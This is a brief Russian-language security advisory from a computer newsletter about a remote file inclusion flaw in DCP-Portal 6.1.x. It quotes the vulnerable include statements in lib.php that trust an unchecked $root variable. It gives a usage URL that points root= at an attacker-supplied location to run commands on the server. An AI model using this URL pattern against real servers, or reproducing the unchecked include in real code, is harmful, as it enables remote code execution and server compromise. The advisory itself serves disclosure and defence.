Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в DCP-Portal.
Компьютер для продвинутых
пользователей
В этом выпуске:
DCP-Portal
ПО: DCP-Portal
Версия: 6.1.х
Уязвимость:
Уязвимость заключается в возможности выполнить удаленную команду на
сервере.
Сам ошибочный код содержится в файле lib.php: include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");
При этом переменная $root не проверяется. Использование: http://example/[dp_path]/library/lib.php?root=[cmd_url]